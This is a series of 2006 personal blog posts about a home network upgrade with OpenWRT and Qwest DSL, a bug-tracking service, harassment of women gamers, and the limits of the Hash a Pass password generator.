The Great Internet Upgrade, part2: What the heck is netfilter?!

As I mentioned in my earlier post, I’m running OpenWRT firmware on my Linksys router. This enables the router to do more than just act as a firewall/router, so that it can do things that you’d normally need some pretty expensive kit to run. (e.g. A Linux box dedicated to the task or some pricey Cisco hardware.)

It works great, I’m happy to say. Package management is smooth and easy, and the basics of routing and firewalling are all taken care of. But there’s a few snags…

Firstly, the firewall. It all works off of iptables for netfilter, which is to say that I need to write some fairly hairy firewall rules. Added to this, I want to use video chat, which requires about sixteen thousand ports to be open in order to work. (Okay, 22 ports, but come ON!)

Then there’s the VPN… Works great, except I can’t make a connection from work. The first PPTP connection goes, but the second one never makes it back to my Mac or PC at work. Dang! Might have to try L2TP/IPSec instead… Ugh.

Lastly, the wireless isn’t as strong as the signal out of my old SBG1000 (which is running an 802.11b signal in my DMZ so that the TiVo and Nintendo DS can get online – everything else is 802.11g and WPA encrypted), so there’s a big dead spot about the size of my dining table, plus the basement is entirely devoid of wifi, now. So I’ve picked up a second WRT54GL which will run OpenWRT and create a wireless distribution system so that I get wifi everywhere.

Yes, I now have the world’s most complicated home network. Kind of fun, from a geeking perspective, but from a usability perspective, I have far more equipment and far less expertise in running it! Such is the price of progress…

If anyone out there can show me how to set up my iptables script so that iChat AV works, I’ll Paypal you $5. No kidding. Lend a fella a hand!

Written on July 12, 2006

Downgrade for speed!

This just in: A MacIIci is faster than a 3ghz P4 Windows box!

Low End Mac compared the performance of a brand new 3 ghz Windows box to an old Mac running system 6. While the comparison was limited strictly to word processing and boot-up times, an upgraded MacIIci blows the doors off the Windows box.

Of course, without restricting yourself to System 6, you can generate considerable performance improvements by just using snappier and faster application. I’m a huge fan of all of Mariner’s products, and find MarinerWrite can open and edit large documents with speeds that put Word to shame.

Or just write in your favorite text editor and paste into Word for your final formatting. (Which also avoids frustration as Word tries to “help” you by reformatting your document every time you delete a line.)

Written on July 7, 2006

Simple hosted bug tracking with 16 Bugs

Bug tracking is a pain, but is very necessary for any size of development project. There’s good bug trackers and bad ones, and there’s folks who have turned bug tracking into an artform.

What there isn’t is simple bug tracking that any schmuck can set up. Well, actually there is, it’s called 16 Bugs.

Following in the “less is more” ideal popularized by 37 Signals, 16 Bugs provides a simple view of bugs, simple bug entry, and simple integration of users.

Me, I’m using it for my crappy software. Never really had bug tracking before…

Written on July 6, 2006

The Great Internet Upgrade, part 1: Adieu, Comcast

I’ve been a loyal Comcast cable internet customer since they first came to my town (some time around ‘99, I think). During that time, I’ve endured a few rate hikes, and have generally been pleased with the improvements to service (especially once AT&T sold out to Comcast and I suddenly had an internet connection that was up more often than down).

Unfortunately, I now live in a new neighborhood, populated with young folks like me and my wife. These people like their internet connections, and they either are major bittorrent users or their kids are gobbling up bandwidth on MySpace. End result: My actual connection to the internet is about 1.5Mbit, when I’m paying for a supposed six meg connection!

So, I finally got fed up. Qwest sent me a timely offer for a 5Mbit ADSL connection for only $26/month, and I grabbed it. If nothing else, DSL guarantees a speedy pipe to your door.

The initial install failed, so I got a tech out. Unlike the typical Comcast grunt who spends half his time on the cell phone with trained folks, the Qwest fellow had a variety of tools and clearly knew his stuff. After checking the obvious failure points (turn it off and on again, double check modem settings, make sure everything’s plugged in), he proceeded down the street to check the main trunk into the neighborhood. Turns out the initial phone wiring was a bit off, so he spent a good two hours out there re-wiring everything! I was impressed.

I was more impressed when I actually tried my DSL connection. Instead of the 5Mb I paid for, I got a screamin’ fast 7Mb connection (which translates to about 5.9Mb in real world use – not too shabby)! Upstream is about 730Kb, real-world, which is a fair sight better than the ~300Kb I’d get from Comcast.

The modem/router Qwest gave me (an Actiontec 701) is actually pretty good, but I’m still hooking it up to a Linksys WRT54GL running OpenWRT firmware. (More on OpenWRT in a later post – I’m still learning my way around.) Things are working quite well indeed.

For a cost-saving upgrade, I really couldn’t be more pleased. Qwest’s service was excellent (despite my dread, having dealt for too long with the USWest/Qwest monopoly – perhaps they’ve improved matters since I last had trouble with a Qwest product), and the internet is still up after 24 hours. Too early to count chickens, but it’s going well for now.

Written on July 6, 2006

Girls don't exist on the internet

>My adventures on the internet have led me to learn many things about myself. I’m not a girl and I do not exist on the internet. I do not play games and do not know how to turn on my computer. I did not build my own PC, nor did I buy a video game. I do not own a headset and do not play first person shooters and MMOGs. My life on the internet is an intricate, well planned lie.

From The Escapist: OMG Girlz Don’t Exist on teh Intarweb!!!!1

It really surprises me that as the internet has become massively popular, it is still a surprise for young boys to find a girl online. That a girl would even be afraid to talk in online chats, for fear of being harassed, is doubly shocking.

Perhaps this is more representative of the rarified world of online role playing games (a nerdier crowd can only be found sitting around a dining room table playing pen and paper Dungeons and Dragons), but please, why doesn’t somebody teach these boys some manners?

Certainly, I have been surprised at times to see girls or women online enjoying the same ludicrious games I enjoy. I had a good online chum back in high school who helped me carve out an empire in Trade Wars, and co-hosted a MUSH (kind of like Second Life without the pictures) with one woman and a gender-bent Philipino boy who desperately wanted to be a young anime superhero girl.

But despite a person’s plumbing or sexual preferences, I never once harassed these women for their pictures, demanded proof, or insisted they weren’t what they were. (Even the Philipino MUSH host went unmasked for quite a while until his/her general weirdness inspired me to seek out his/her web page to see what this wingnut was all about – the web page where I ultimately found his/her picture.)

But really, folks, teach your boys some manners. Online or off, that’s no way to treat a lady. Nor is it anyway to treat a cross-dresser.

Written on June 28, 2006

Hash a Pass: No panacea

Hash a Pass was recently featured on Digg.com and is an interesting idea. Using a master password and a Javascript implementation of the SHA-1 hash algorithm, you can generate a secure and un-guessable password, and then simply re-generate it when you need it again.

A nifty trick, to be sure, but does this really make you safer?

Here’s an example of how it works: I set my master password to my super-secure 133t password of ‘p@22w04d’. Then I generate a password for, say, Apple.com. So I type in “apple” as the parameter and it generates the wonderful password of ‘EZbqNhEK’, which is really a pretty strong password.

When I then go back to Apple, I can go back to hashapass, and enter the same two keys, and get the same password. End result: Lots of cryptographically strong passwords which I don’t have to remember! All I need is my master password!

Here’s the question, what does this protect me against?

Anyone using the same algorithm can re-create any of my passwords by entering the two keys. The key for each site/password I want to maintain will necessarily have to be easy to remember (such as the site’s domain name or title). So, if they can guess my master password, it will be trivially easy to get at anything I’ve registered for.

What it does protect against is the possibility that one site’s passwords will be leaked/cracked/stolen, and that my password which I use there (and everywhere else) will be tried in a dozen sites, given the thieves access to everything.

It’s not a huge benefit over storing or memorizing passwords, as I still need to remember which sites I’ve used hashapass for, and remember what key I used for the site. (Again, the domain name becomes the most likely input.) This is roughly analagous to having all your passwords stored in an encrypted file/database with a single “master password” to unlock all of them.

Is it better than using the same password on every site? Undoubtedly yes. But it’s hardly 007-grade security. Indeed, it’s probably safer to use a product like Web Confidential to keep a variety of passwords and just look them up when you need them. Yes, someone gaining the file and the master key will have the keys to your kingdom. But with hashapass, they only need the master key; the “database” is right there online.

Written on June 26, 2006